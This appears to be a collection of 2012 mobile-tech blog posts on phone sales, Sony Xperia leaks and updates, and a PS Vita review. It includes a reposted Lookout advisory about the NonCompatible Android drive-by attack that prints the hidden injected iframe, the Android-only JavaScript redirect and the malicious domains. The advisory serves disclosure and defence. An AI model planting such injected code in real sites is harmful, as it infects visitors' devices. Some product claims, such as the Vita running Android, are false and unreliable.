Samsung may be reaping the rewards from its multiple Galaxy product ranges, but Apple is showing that the world can be dominated with just a few products. Latest research from Gartner shows that Apple has gained 7.9% market share of the entire global phone sales market, despite only have three iPhones on sale. The research firmly pegs Apple in third place behind Nokia and Samsung.

Total sales of mobile phones are down on last year, but smartphones continue to rise as more people choose smartphones over featurephones. Gartner also warns that whilst Apple’s iOS (and Windows Phone) offer different experiences, devices running on the Android platform would struggle to differentiate going forward with the main differential being price, especially in the mid-range.

“This is particularly true for smartphones based on the Android OS, where a strong commoditization trend is at work and most players are finding it hard to break the mould.”

Latest research from ABI Research shows that the majority of users spend little to nothing on mobile apps, with more than 70% of users spending less than $7.50 per month. The research also found that the top 3% of spenders accounted for nearly 20% of all revenue generated.

“The median amount among the consumers who spend money on apps is much lower than the average, just $7.50 per month,” senior analyst Aapo Markkanen said. “This reflects the disproportionate role of big spenders as a revenue source.”

The research also found that the apps that generated the most revenue were often utility apps targetted at business professionals or iOS games with in-app purchases, as Apple discovered.

Whilst the research concerns the US market, it can be applied to app revenue generation globally and although not accurate, it can provide an indication of app revenues worldwide.

Here’s the full press release.

3% of Users Account for One-Fifth of All Money Spent on Mobile Apps

LONDON – May 14, 2012
?According to a US consumer survey conducted by ABI Research, about two-thirds of app users have spent money on an application on at least one occasion. Among these paying users, the mean spend was $14 per month. Behind the seemingly high average amount there are, however, some striking findings.

Senior analyst Aapo Markkanen explains, “The median amount among the consumers who spend money on apps is much lower than the average, just $7.50 per month. This reflects the disproportionate role of big spenders as a revenue source. The highest-spending 3% of all app users account for nearly 20% of the total spend, while over 70% spends either nothing or very little.”

The numbers also reflect certain trends in different app categories. Thus far, the releases that have best succeeded in making money have typically been utility apps often used for business purposes, or iOS games monetized through strings of in-app purchases. In both cases the money comes from a remarkably small base of customers. Is there anything developers can do to boost the conversion rate from free to premium?

Markkanen has two recommendations. “First, don’t get obsessed by mobile and apps, but remember also the web,” he adds. “Most of the successful app concepts either support, or are supported by, a web component. Second, see your product through a long-term lens, asking yourself what could convince your customers to still engage with the app in two years’ time. Evernote, for example, has excelled at both. It has skillfully combined the web and the mobile, and at the same time it has also managed to become a habit for many of its users. It demonstrates that the longer its customers stick around with a free version of an app, the likelier they’re going to convert to its premium version.”

Traditionally Google has only launched one Nexus branded handset per year, following the lead of Apple, but that could be set to change according to the Wall Street Journal. WSJ report that Google is planning a much bigger roll out of Nexus branded handsets this year with up to 5 manufacturers, including Motorola who are being purchased by Google, all launching Nexus branded stock Android smartphones.

Why is Google planning this? To ease growing unrest over the company’s planned acquisition of Motorola which Google partners believe could give the company unfair favouritism. Google is also hoping that the launch of a range of Nexus branded stock Android devices would mean that the hardware OEMs differentiate against each other based purely on hardware, and not the current hardware/UI differentiation status quo.

Google is also hoping that offering multiple manufacturers early access to the latest Android build will represent faster updates for non-Nexus devices and the WSJ also comments that Google could look to enforce the pure Android platform on all Android devices as the use of custom UIs often leads to slower updates and a poorer experience.

Google’s plan of attack isn’t exclusive to mobile smartphones either as the company could use the same concept to relaunch Android tablets. The new Nexus branded handsets would be sold directly through Google’s online store, network-free, unlocked and at a full price.

The Sony Xperia S27i has been leaked by its user agent profile on Sony’s website, bringing some details about the as-yet unannounced device. The Xperia S27i, codenamed ‘Lotus’ is expected to be the successor to Sony’s Xperia Active smartphone.

We’re expecting the S27i Lotus to feature a rugged profile, possibly waterproof and/or dustproof, as well as a WVGA resolution display and 1GHz dual-core ST-Ericsson NovaThor U8500 processor. The user agent shows the device running the Android 2.3 Gingerbread platform, and like the 2011 Xperia range, we’d expect this to get an update to Android 4.0 Ice Cream Sandwich either by launch or post-launch.

Back at CES 2012, Sony unveiled the Xperia S which was their first own branded device. Featuring a sleek design, excellent camera and amazing style, the device had everything but the latest version of Android.

Users of Sony’s flagship 2012 smartphone had been told that the Android 4.0 Ice Cream Sandwich update would be coming “in the future” but without any concrete dates and now it’s been leaked the update will come by the end of May/early June. The release date comes via one of Sony’s support staff who wrote on their forums that the official Android 4.0 update for the Xperia S would land in that timescale.

Sony’s handheld gaming solution, the PlayStation Vita, has recovered from a slow start to post total sales of 1.8 million, the company said.

The company revealed back in February that sales had hit 1.2 million, and the launch of the device in other markets globally (including the US and the UK) during February and March helped Sony grow sales by a whopping 50%.

The Vita brings a whole new potential market to the fore, with a portable gaming console finally boasting other smart features; the Vita runs on the Android OS and as we covered in our review, the device combines Sony’s gaming capabilities with a custom Android build that brings internet browsing and social features to the device.

Sony has also projected that between April 1st 2012 and March 31st 2013, the company will sell approximately 10 million PS Vitas and prove that the market for such a device is well and truly alive.

Just walked past the Orange store and all the windows are displaying the network’s latest offer, which sees Sony’s first own-branded device, the Xperia S, available from just £21 per month when bought with Orange Home Broadband.

That’s a total cost of £31 per month, which is great value for a great smartphone (read our review) as well as unlimited home broadband.

This offer follows on from last month, where Orange offered up the HTC One X for £31 per month when upgrading your contract and taking home broadband. Whilst the One X offer was good, the Xperia S offer is brilliant.

Head over to Orange’s website or an Orange store near you now.

Sony blames the transition to Sony Mobile and a focus change which saw them switch from feature phones to smartphones for the loss of sales.

Sony Mobile reported a loss of Eu1.15bn for annual sales ending 31 March. Increasing competition and component shortages from floods and earthquakes in Asia added to higher restructuring charges.

The company predicts that sales will increase significantly although it recognised the ‘severe competition’ that was in the smartphone market.

We are not sure what to do put the white-crazed effect that is consuming every technological device known to man, woman or child. But, whatever it is we like it.

Sony’s PlayStation Vita previously only available in Black now comes dressed in white. In addition to the console, Sony will be selling an ‘inner ear headset’ also in white for $35, plus a leather case, carry pouch and strap. Once your all dressed in white you will make a very pretty looking storm-trooper. The new device will be price at $313 for the WiFi version and $375 for the 3G.

There is no news yet as to whether the device or accessories will come to Europe but we would think that with the popularity of everything white, that it should arrive in the near future.

Latest research from market research firm Nielsen has shown that more than half (50.4%) of US mobile subscribers now own a smartphone, following an increase from December 2011 (47.8%).

Smartphone penetration continued to dominate the key US market, with Apple being called the top manufacturer whilst Android was touted as the top platform. Nokia’s Lumia 900, released in the US last month, has continued to do well and capture consumers’ imagination, whilst the Windows Phone platform only captured 1.7% market share in Q1 2012 (even Windows Mobile, the older version of the platform, had a higher market share at 4.1%).

During Q1 2012, 48% of smartphones ran Android, whilst iOS captured 32% market share and RIM’s fledgling BlackBerry platform came in at a healthy 11.6% market share.

There is no denying that mobile gaming is most definitely on the up and a new study has found that between iOS and Android, mobile gaming is worth up to five times more on Apple’s iPhone versus the spate of Android devices.

The study was conducted by research firm Newzoo, who looked at data from iOS and Android and conducted a survey amongst 17,000 people. Some of the data found by the company includes 28% of smartphone gaming takes place on an iPhone whilst 60% of tablet gaming takes place on an iPad. The most interesting fact is that 91% of all mobile gaming revenue comes from in-app purchases whilst only 9% comes from the actual cost of the game.

Newzoo CEO, Peter Warmam, attributes the success of iOS to the in-app purchase experience:

When analyzing Apple’s successful monetization, there is one dominant factor outside of differences in audience demographics and preferences: Apple requires users to connect their credit card information directly to their account, thus creating a seamless purchase experience.”

The Android phone is under attack by a new form of hacking attempt. Please read the full information below and be wary of installing any unofficial products or apps.

Security Alert: Hacked Websites Serve Suspicious Android Apps (NonCompatible)

Hacked websites are frequently used to infect PCs with malware; however, today we have identified the first time hacked websites are being used to specifically target mobile devices. Lookout is in the process of rolling out an update to protect against the new threat, NonCompatible.

How it Works

In this specific attack (called NonCompatible), if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.

When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app. In order to actually install the app to your phone, you must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”). If the device does not have the unknown sources setting enabled, they will not be affected by the application; however, if a user does have the unknown sources setting enabled, installing the app will result in their device becoming infected.

Technical details

Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

This page causes the browser to immediately attempt to access the page at androidonlinefix.info. Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page). When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it.

Technical Summary

Suspicious applications are currently served from the following sites:

· gaoanalitics.info

· androidonlinefix.info

Command and Control (C&C) domains include:

· notcompatibleapp.eu

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous. As Lookout identifies the extent of infected websites, we will update this blog post.

The Lookout security team is actively investigating the infected websites and suspicious application.

** Update **

Following our earlier story this morning with Three network being the first to get the Android 4.0 Ice Cream Sandwich updates to their customers who own the Sony Xperia arc S, others too are now receiving updates.

Or at the very least, I am. I am at present downloading the Ice Cream Sandwich updates for my SIM Free, Sony Xperia arc S.

However, I did have a bit of a kerfuffle. I am loath to install software on my Macbook unless absolutely necessary. Firstly, I had to download Sony Bridge for Mac which is Sony’s answer for back-up etc for phone devices. Then I began the update only to find I ask had to install Java to my PC… sigh… But, finally we are now downloading the update after that process.

I will update this post once the download is complete and we are successful.

As an owner of the arc S this can only mean good news for me, because where Three goes, other networks should follows – therefore, I am hoping to see updates to my SIM Free very soon.

Head on over to the Three portal to grab your update. I believe this one has to be done via PC and is not available OTA.

So we’ve seen Sony’s upcoming LT29i Hayabusa, which covers the high-end market for the newly formed Sony Mobile Communications, but what about the low-end? Well it looks like Sony is preparing the ST21i Tapioca to cover that market.

We first heard of the Tapioca monniker on a leaked roadmap, but following that the device hasn’t really made an appearance until now. The specs list to accompany the rather bulky device is a pretty low end for 2012, with a 800MHz Qualcomm single-core CPU and 512MB RAM on board.

Given that the Xperia NXT series (such as the Xperia S) kicked off running Android 2.3 Gingerbread out of the box, we’d expect the same for this device but unlike its bigger brothers, the low performance hardware means we may not seen an Ice Cream Sandwich update at a later date.

Sony are back in the game, that’s clear. The launch of their Xperia S smartphone has been really positive in the UK and things are looking on the up for the company following their buyout of Ericsson in the joint venture.

Yet another Sony smartphone has leaked and the latest leak shows the company is definitely headed in the direction. We first heard of the Sony LT29i earlier this year, where a leaked roadmap revealed a summer launch and €493 price tag.

We now know what the Hayabusa will offer for that price, with the device set to feature a 4.55 inch 720p HD display, 13 megapixel camera (rather bizarre number) with high dynamic range video, a 2200mAh battery (wowzer!) and a Qualcomm Snapdragon dual-core S4 CPU.

The device will run Android 4.0 Ice Cream Sandwich and the best thing about this device is that it will be packed into a chassis just 7mm thick, making it far thinner than a lot of smartphones and possibly even thinner than the iPhone. The device should get announced in June and released in July.

Rumours of a new flagship product from Sony came to light several weeks ago. The device codenamed LT29i Hayabusa, is due for release in the Summer according to latest reports. Little is known about the LT29i barring its possible chipset, the Snapdragon S4.

However, todays leak has arisen out of a Chinese blog claiming Hayabusa will arrive with a 13 megapixel camera including HRD video recording an da 4.55 inch HD reality display. The process or is based on the S4 Pro with an upgraded GPU.

The new Sony flagship or duct is likely to have a 2200mAh battery which would compensate those who feel that the all new designs of the slimmer phones with bigger screens from manufacturers are being placed on the sales shelf with insufficient battery capacity to handle the new big displays.

The final product is thought will be known as the Xperia GX.

Consumers are enjoying the Xperia range, myself in particular, with the arc S. Its ultra slim design with larger screen is admired by all. Sony recently announced the Xperia S, Xperia U and Xperia P. Only the S has so far been seen in the hands of the public.

Nokia have posted a new advert for the Nokia Lumia 900, with the latest “Beta Test” commercial depicting how all smartphones don’t have to look alike.

The “Beta Test” series kicked off with the first ad which targeted Apple’s iPhone and the latest advert takes the fight to both iPhones and Android devices, which have the unfortunate similarity of looking like their peers and not feeling unique.

Nokia’s first ad may have been risky, but the latest ad focuses on one of the areas where Nokia has always excelled; design (camera quality and usually battery life are some of the others).

Yet another Sony device has had its Camera samples leaked, this time the device in question is the Sony LT29i Hayabusa, which is expected to be released in July.

The leaked camera samples show a drab flower pot and a computer keyboard/screen, but whilst the pictures are dull, the included EXIF data shows more fo the story with the rumoured specs list set to include a 4inch display with 720 x 1196 pixels resolution as well as a 1.5GHz dual-core Snapdragon S4 MSM8960 chipset. It is also expected to feature capacitive buttons like the Sony Xperia S (see our review here).

Xperia 2011 owners can breath a sigh of relief, myself included. The roll out of Android 4.0 Ice Cream Sandwich has begun with the Scandinavian countries receiving it first. These include Sweden, Denmark, Iceland, Finland and Norway.

It should not be too long before it hits the rest of us. Android 4.0 brings new widgets and a smoother operation system with improvements in the UI, theme and functionality of Android.

Owners of other Xperia devices will need to double-check whether they are in the line-up to receive the new operating system.

Xperia 2011 owners, check here for further details and information you will need to check when the upgrade is available for you.

Unlike his predecessor, Nokia’s CEO Stephen Elop is not media-shy, this time talking to a Chinese newspaper where he says that multi-core mobile processors are a waste of battery life.

Yangcheng Evening News quotes Elop as having said:

“The so-called dual-core, quad-core mobile phones can only waste batteries, but not be useful for consumers all the time.”

Nokia’s current adopted OS, Microsoft’s Windows Phone, does not support multi-core processor and Elop claims that the company’s single-core flagship, the Lumia 900, has not been beaten (in Microsoft’s Smoked by Windows Phone campaign) by the iPhone or an Android smartphone, despite the plethora of dual and quad-core processors found in those smartphones.

Elop is most definitely not media-shy, having been interviewed several times with the result usually being some form of war of words against a rival product or OS. Whilst it’s not the best way to do things, it’s great to see Nokia’s leader fighting back against “unjust” claims.

He’s only been in the job a few weeks but Sony’s new CEO, Kazuo Hirai is already shaking things up at the electronics giant, announcing the company’s new “One Sony” strategy which will result in nearly 10,000 job cuts.

Hirai was speaking to investors in Japan today (12th April), and unveiled his five point plan to restructure the company, which includes strengthening the company’s core business areas of digital imaging, gaming (see our PS Vita Review) and mobile (see our Xperia S review).

Sony will integrate several business functions (research and development, design engineering, sales and marketing) for its smartphone, tablet and laptop businesses allowing it to deliver “compelling” new products to market quickly.

Hirai also said the company will use their digital imaging and gaming expertise in their mobile devices, with smartphones becoming the “Hub Device“.

Hirai announced the company’s financials on Tuesday, warning it stands to lose around ¥520 billion (£4.05bn), but in today’s call, Hirai gave the company’s forecasted figures with the company’s global mobile sales expected to total ¥1.8tr (13.96bn) by the end of its 2014 financial year.

Sony said that by 31 March 2015, it expects to have total revenues of ¥6tr (£46.5bn) with an operating profit margin of 5%. The total cost of restructuring is estimated to be ¥75bn (£581.1m), which seems a small price to pay given the expected returns.

Hirai said:

‘We must accelerate the speed of our management, reform our business portfolio, and innovate.

‘Our goal at Sony is to become a company that creates products and services that stimulate curiosity in customers around the world and gives them an emotional experience.’

Editor’s Note: This review was written by Joe Cronin from BetaMetric. Over to Joe…

PS Vita Review

The long awaited successor to the PSP Go was released just a matter of weeks ago after months of anticipation. The PS Vita, Sony’s second handheld console to rely on downloaded software rather than cartridge based games, is undoubtedly a powerful machine. However, is there room in people’s pockets for a dedicated games machine? UK Mobile Review has been putting the PS Vita through its paces for the last month to find out.

Hardware

There’s no denying that the PS Vita isn’t a size zero device. Weighing in at a hefty 279g and measuring 182mm across, this is only really suitable to carry in your pocket if you’re wearing cargo trousers (so should probably stay in the bag). Along the bottom of the device you’ll find a 3.5mm headphone jack and of course a charging socket using a proprietary connection. This comes as no surprise being a Sony device.

Along the top is an unmarked accessory slot and a memory card slot, which only takes PS Vita memory cards. It puzzles me why Sony has included so many device-specific features in a machine that many will view as slightly superfluous to their needs. Making it as compatible as possible with people’s existing products would surely make it easier to sell. The PS Vita cards don’t come cheap either (Zavvi are selling a 16GB one for £34.95), so be wary that if you plan to use your Vita as your primary media device you’ll need to pay through the nose for storage.

On either edge of the device are Sony’s shoulder buttons. Understandably there are no R2 and L2 buttons, which may make transporting some existing console games to the platform difficult, though it’s hard to see how they could have been included. Sony also appears to have borrowed a few design cues from Apple for its power button and volume controls, as they bear an uncanny resemblance to that seen on the iPhone 4. Everything feels well built and durable – this is a gaming device designed to take some punishment.

The front of device is dominated by a marvellous 5” 960 x 544 Super AMOLED Plus screen which has fantastic viewing angles. Colours are bright and crisp and blacks are deep, although brightness in the unseasonable sunshine we’ve seen recently in the UK was an issue, even when cranked to full. Regardless, Sony has housed a high-end screen in their flagship handheld gaming device and it shows. You can even see how its pixel count compares with other devices by checking out handy guide made by LukasMathis and his microscope.

Sitting either side of the screen are Sonys familiar D-pad and gaming controls as well as a two small Start and Select buttons. These respond well and fit nicely with the whole aesthetic of the machine. The ‘pièce de résistance’ though is the two analogue sticks. These are a marvellous design feat and epitomise what the largely useless stick on the original PSP should have been. Despite their diminutive size, they are tactile enough to respond to even the slightest touch and their texture makes them comfortable enough for hours of use.

It is also worth noting that Sony has included two VGA cameras (front and back). It’s best to steer clear of these for taking pictures, although they do prove useful when playing augmented reality games. The back is also home to a large capacitive touch pad, which we’ll ‘touch on’ later.

Software

The PS Vita menu system is an original guise which offers plenty of handy features. The main screen certainly takes inspiration from the ‘app based’ menu used by iOS and Android – Sony has opted for a selection of ‘bubble’ icons to represent games and system utilities alike. As with any app based menu system, colours and locations can be customised. Despite feeling a little messy at first, navigation is actually fairly intuitive. As well as swiping from side to side, you can also make use of the Playstation button to bring up a list of your last six activities. On a side note, the edges of the icons appear slightly jagged. I’m sure this isn’t due to the display considering its resolution, so can only conclude that low-res icons have been used, which seems sloppy.

Another oddity that plagues the OS is the inability to be able to use the controls, which is essentially the reason you’re carrying such a large device. Navigation throughout the device requires you to sully the AMOLED screen at nauseum. They have also followed the way of the Wii and included some horrendous elevator music to accompany the menus. There are glimpses of innovation to like, such as the ‘peeling’ animation used when you wish to close a game/application, but I’m left wanting more.

Since release, Sony has released updates to allow you to connect your Vita to your Mac as well as PC. The originally named ‘Content Manager Assistant’ weighed in a at a slim 5.5MB (on Mac) and was simple enough to setup. Once it has indexed all the files in your chosen folder location, you can pick and choose which files to transfer on your Vita’s screen. Music plays adequately on the machine, although it’s unlikely you’d be using the device for your audio. The only video codecs currently supported are MP4 or H.264, meaning any AVI files you have will need to be laboriously transferred to be played on the PS Vita.

Games

Arguably the centerpiece of the PS Vita is its ability to play visceral games with ease. And it certainly delivers. Powered by a quad core ARM Cortex-M9 MPCore processor, the Vita delivers near-PS3 visuals with aplomb. Movement is smooth and colours are vivid – the only real let-down is certain textures and shadows. Using the dual-stick controls is a liberating experience whilst on the move – the tactile feedback that physical buttons provide is something never to be matched by touchscreens. It strikes me as puzzling then that so many of the Vitas games rely on touch for navigation. Furthermore, the much touted touchpad that dominates the rear of the device proved to be a source of frustration. FIFA Football, for example, allows you to pick a part of the goal to shoot at by touching the corresponding area of the touchpad. Whilst the innovation exhibited should be admired, I often found my hands inadvertently touching the back of the device. It also seems counter-intuitive to include so many touch-driven ways to interact with the Vita when it’s large size is due to the inclusion of arguably market-leading physical buttons. Whilst including touch capabilities on the main screen is a given in the current market (unless you’re a Kindle), I feel that making the device a bit smaller by dropping the rear touchpad would have made more sense.

You can purchase Vita games either in memory card form or by downloading them from the Playstation Store. Downloading games via 3G is a no-go as most of them tend to exceed 20MB, meaning you’re better off opting for a WiFi version of the Vita. You are able to download demos and trailers with ease, which makes your buying decision a bit easier. What’s more difficult to swallow is the cost of the games. Most Vita games cost from £39.99 which is a phenomenal amount for a game you can only play on a 5” screen. FIFA 12 costs just £3.99 on the Apple App Store, compared to £44.99 on the Playstation Store. With iOS devices enjoying a huge market share, it seems almost arrogant that Sony believes consumers will be willing to part with that much cash for their Vita games. Luckily, games can be purchased in physical form so hopefully consumers will be able to take advantage of the second-hand market in the future.

Once you’ve purchased games, they appear as a bubble on your Vita homescreen. Along the top of the start page of each game is a link to the games website, user manual and update page, which is a nice touch. You’re unable to have a game running whilst you watch a film, although apparently this feature will be included with a future system update.

Conclusion

There’s no doubt that Sony has created a very powerful handheld gaming device in the PS Vita. It has thrown everything it can into creating a machine with excellent build quality that can play cutting-edge games. The controls are tactile and the games look good. However, the PS Vita is let down by Sony’s insistence that you use proprietary peripherals and pay through the nose for games. If the PS Vita had been truly integrated with the PS3, it should have adopted a ‘Triple Play’ model akin to what we’re now seeing with Blu-rays. Buy the film on Blu-ray, and receive it on DVD and in MP4 format for free. Bundle FIFA 13 on PS3 and PS Vita and paying £44.99 makes a bit more sense. Instead, Sony seems to have developed a new platform from scratch which demands proprietary peripherals, as well as overpriced software. If you’ve a long commute ahead, I’d recommend the PS Vita as a capable piece of hardware to keep you entertained. However, on top of a well-equipped smartphone, it’s an expensive luxury.

The biggest U.S. mobile provider, Verizon Wireless has announced plans to start charging customers a $30 fee on top of the handset price paid on upgrades with the extra revenue used to offset Verizon’s ever growing costs.

Last quarter, Verizon reported a decline in wireless profit margins, which were deeply affected by the amount Verizon paid to Apple to gain rights to sell the popular iPhone.

Whilst new subscribers often help to boost revenue, existing customers switching devices can often lead to little or no extra revenue for the company, which is one of the principal reasons Verizon is introducing this fee.

The US' "Big Four" carriers announce plans to introduce a collective database of stolen phones to prevent their use in the US, similar to the UK's current database.

The big four network carriers in the US, Verizon, AT&T, Sprint and T-Mobile, have today announced plans to introduce a database containing the IMEI (identification) numbers of stolen mobile devices.

One of the biggest problems that affects mobile users worldwide is stolen phones, of which there are growing numbers, and the use of them afterwards. The UK operates a national crime database which disables the use of any handset listed as stolen (or lost even) on any UK network. However, these devices work freely outside the UK.

With the US’s top four carriers catering for around 90% of mobile device usage in the US, the idea of a combined database makes perfect sense and should prohibit the use of those devices on any of the four carriers. The combined database should launch within six months and there are plans to make this into a national database within 18 months, disabling the use of any of those devices on any US network. The plans are being backed by CTIA.

There are four voluntary industry commitments in place in the US, which address the issue of stolen devices:

Implement databases to prevent reactivation of stolen smartphones.

(A) Notify consumers of features to secure/lock smartphones with passwords.
(B) Educate consumers about features to secure/lock smartphones with passwords.

Educate consumers about applications to remotely lock/locate/erase data from smartphones.

Educate consumers about smartphone theft, protections and preventative measures.

The plans are sure to be a great deterrent against mobile phone theft and this could eventually lead to cross-Atlantic (or even global) co-operation to prevent the use of stolen smartphones around the world.

More on this when we get it.

Sony is to report huge billion net loss for fiscal year 2011.

Sony forecasts a record $6.4 billion loss. This doubles the previous estimate for fiscal year 2011 from $2.9 billion loss.

Sony say the additional losses are

“primarily due to the establishment of valuation allowances against certain deferred tax assets, predominantly in the U.S.

This is a troubling time for Sony when only yesterday they reported the loss of 10,000 jobs, 6 percent of its global workforce.

The troubled Japanese consumer electronics giant is due to set out a brief of the company’s business plan on 12 April when it is likely the reports will be confirmed. The annual results for Sony will be published on 21 May.

Sony is to cut 6 percent of its global workforce according to a new report.

The report from Nikkei states 10,000 jobs will be cut with most positions expected to come from Sony’s chemicals and smaller midsize LCD operators. It is unclear at this present time whether job cuts will be effected in Sony’s workforce in Japan or overseas.

Sony has had a dismal yearly forecast and has had a recent change of leadership. Kazuo Hirai replaces Howard Stringer as CEO and president of Sony. According to the report, Sony may ask back for a return of the yearly bonuses paid to its seven directors and that would include Howard Stringer.

Sony has declined to comment on the report but it is known that Hirai is set to brief the new business plan of the company on Thursday, 12 April.

At a date point of March 2012, Sony employes 168,200 people, globally.

We picked up our Sony Xperia S earlier this month in Spain and we’ve been busy testing out its 12MP camera. We took it on a little tour in Central London and following on from the first set of images we put up, we’ve got some more below for you! All photos were taken using default settings and using the camera button to focus.

We’ve included the full size untouched unwatermarked photos below but please link back to us if you use the photos elsewhere!

Apologies on how long it took to upload the second part of this series; we had some server issues and had to wait to move to our new server before we could upload!

Sony is on target to serve up its Android 4.0 Ice Cream Sandwich to Xperia smartphones.

For those of you lucky enough to get a taste of the real thing at Mobile World Congress both literal and virtual, the Xperia devices are to receive their upgrade very soon.

The first Xperia smartphones to receive the new upgrade will be Xperia arc S (yeah for me), Xperia neo V and Xperia ray. We will get this from mid-April and over the following 4-6 weeks.

After which, the following devices will receive updates including: Xperia arc, Xperia PLAY, Xperia neo, Xperia mini, Xperia mini pro, Xperia pro, Xperia active and Sony Ericsson Live with Walkman. The scheduled rollout for the updates starts from the end of May/early June.

The rollout as always is dependent on the operator so do not worry if you do not see your update appear at the same time as others, it will be coming to you.

The Sony blog had this further to say about the forthcoming update:

The latest version of Android 4.0 is a very powerful OS, brimming with new features and functionality, but it also requires more resource from your smartphone and this may impact performance in some user scenarios. To ensure it’s suitable, and performs for your individual needs, my friends at Developer World have taken a closer-look at how Ice Cream Sandwich will change your 2011 Xperia smartphone – check it out here.

Because this update is a significant revamp of some of your phone’s features, we want to make sure you take a conscious and informed decision to upgrade, so that you continue to enjoy optimum experiences from your Xperia smartphone.

Therefore, we’ll only be making it available for download via PC Companion and Bridge for Mac (i.e. not over the air via 3G or WiFi), and you also won’t receive any update requests or notifications.

Again, we will get back to you with more information in mid-April when the rollout begins.

Finally, with regards to our all new Sony Xperia S, which will be upgraded to Android 4.0 starting from the later part of the second quarter, we will get back with more detailed information on timing over the next weeks.

*The availability and scheduling of this software upgrade and specific models upgradeable to Android 4.0 will vary by market and carrier requirements.

Are you an owner of an Android device that has already had the Andrioid 4.0 Ice Cream Sandwich update?

Sony has released a beta product for its upcoming Android 4.0 Ice Cream Sandwich. The beta is only for Xperia PLAY owners of the Android gaming smartphone

Sony recommends that you should ideally be a ‘advanced developer’ with knowledge on how to install the beta product and how to switch between the different ROM’s. In normal speak, if you do not know how to do it, you may break your phone and we hold no responsibility for it.

Your Xperia PLAY will need to be off network, i.e. sim free and unlocked. Read more about the process over at the Sony Developer Blog and do remember to come back and let us know how you are finding the new update to Ice Cream Sandwich.

I’m not going to lie, Google’s rebranding of the Android Market to the Google Play Store really does seem pointless but you can see why Google has done it.

Some users have found out that apps, that they hard forked out their hard earned money for in the Android Market, had gone missing when Google rebranded the market. The same users were getting errors when trying to access the app directly.

Rest assured, Google is looking into the matter having added it to their Known Issues pages. We’ve not had the bug ourselves but it’s definitely an issue if it affects you. Hopefully Google will roll out a fix very soon.
